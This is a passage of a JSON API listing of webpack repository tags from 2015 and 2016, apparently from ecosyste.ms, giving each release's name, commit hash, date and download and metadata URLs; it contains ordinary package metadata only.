ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T1